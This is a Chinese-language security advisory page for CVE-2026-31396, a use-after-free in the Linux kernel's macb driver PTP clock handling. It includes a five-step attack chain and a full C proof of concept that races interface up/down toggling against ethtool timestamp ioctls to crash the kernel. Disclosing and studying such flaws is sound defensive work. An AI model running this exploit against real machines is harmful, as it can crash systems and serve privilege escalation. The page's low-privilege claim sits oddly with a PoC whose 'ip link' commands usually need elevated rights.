CVE-2026-31396 CVSS 7.8 高危

CVE-2026-31396 Linux内核macb驱动释放后重用漏洞

披露日期: 2026-04-03

来源: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

漏洞信息

漏洞编号

CVE-2026-31396

漏洞类型

释放后重用

CVSS评分

7.8 高危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux Kernel

漏洞概述

Linux内核中的macb驱动程序存在释放后重用漏洞。PTP时钟在接口打开时注册，关闭时销毁，但在接口关闭期间，ethtool的get_ts_info调用仍可能访问已释放的PTP时钟内存。此漏洞可能导致内核崩溃或潜在的权限提升，CVSS v3.1评分为7.8分。

技术细节

该漏洞位于drivers/net/ethernet/cadence/macb_main.c中。当网络接口关闭时，macb_close()函数调用gem_ptp_remove()，进而调用ptp_clock_unregister()释放PTP时钟对象。然而，如果在释放操作进行时或完成后，用户空间程序通过ioctl系统调用触发ethtool_get_ts_info()，内核会尝试在gem_get_ts_info()中访问已释放的ptp_clock结构体以获取索引信息。这种竞态条件导致KASAN报告use-after-free错误。由于攻击向量为本地且权限要求较低，攻击者可利用此漏洞造成系统崩溃或结合其他技术进行提权。

攻击链分析

STEP 1

步骤1

攻击者获取本地低权限用户访问权限。

STEP 2

步骤2

攻击者编写并执行程序，创建并发线程。

STEP 3

步骤3

一个线程循环执行网络接口的关闭与打开操作（macb_close/macb_open），触发PTP时钟的销毁与创建。

STEP 4

步骤4

另一个线程并发调用ethtool获取时间戳信息，尝试访问PTP时钟。

STEP 5

步骤5

触发竞态条件，导致内核访问已释放的内存（Use-After-Free），引发内核崩溃或潜在代码执行。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

/*
 * PoC for CVE-2026-31396: Use-After-Free in macb PTP clock
 * This code races interface close/open with ethtool get_ts_info calls.
 * Compile: gcc -o poc poc.c -lpthread
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/ioctl.h>
#include <sys/socket.h>
#include <linux/sockios.h>
#include <pthread.h>
#include <linux/ethtool.h>

#define IFNAME "eth0" // Replace with actual interface name

void* toggle_interface(void* arg) {
    char cmd[128];
    while(1) {
        snprintf(cmd, sizeof(cmd), "ip link set %s down", IFNAME);
        system(cmd);
        snprintf(cmd, sizeof(cmd), "ip link set %s up", IFNAME);
        system(cmd);
        usleep(1000);
    }
    return NULL;
}

void* trigger_ethtool(void* arg) {
    int sock;
    struct ifreq ifr;
    struct ethtool_ts_info info;

    sock = socket(AF_INET, SOCK_DGRAM, 0);
    if (sock < 0) return NULL;

    memset(&ifr, 0, sizeof(ifr));
    strncpy(ifr.ifr_name, IFNAME, IFNAMSIZ - 1);

    while(1) {
        memset(&info, 0, sizeof(info));
        info.cmd = ETHTOOL_GET_TS_INFO;
        ifr.ifr_data = (void*)&info;
        ioctl(sock, SIOCETHTOOL, &ifr);
    }
    close(sock);
    return NULL;
}

int main() {
    pthread_t t1, t2;
    printf("Starting PoC for CVE-2026-31396...\n");
    pthread_create(&t1, NULL, toggle_interface, NULL);
    pthread_create(&t2, NULL, trigger_ethtool, NULL);
    pthread_join(t1, NULL);
    pthread_join(t2, NULL);
    return 0;
}

影响范围

Linux Kernel (Cadence MACB driver enabled)

防御指南

临时缓解措施

建议立即更新Linux内核以修复此漏洞。如果无法立即更新，应严格限制本地用户的访问权限，并禁用非必要的网络接口或PTP功能以减少攻击面。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表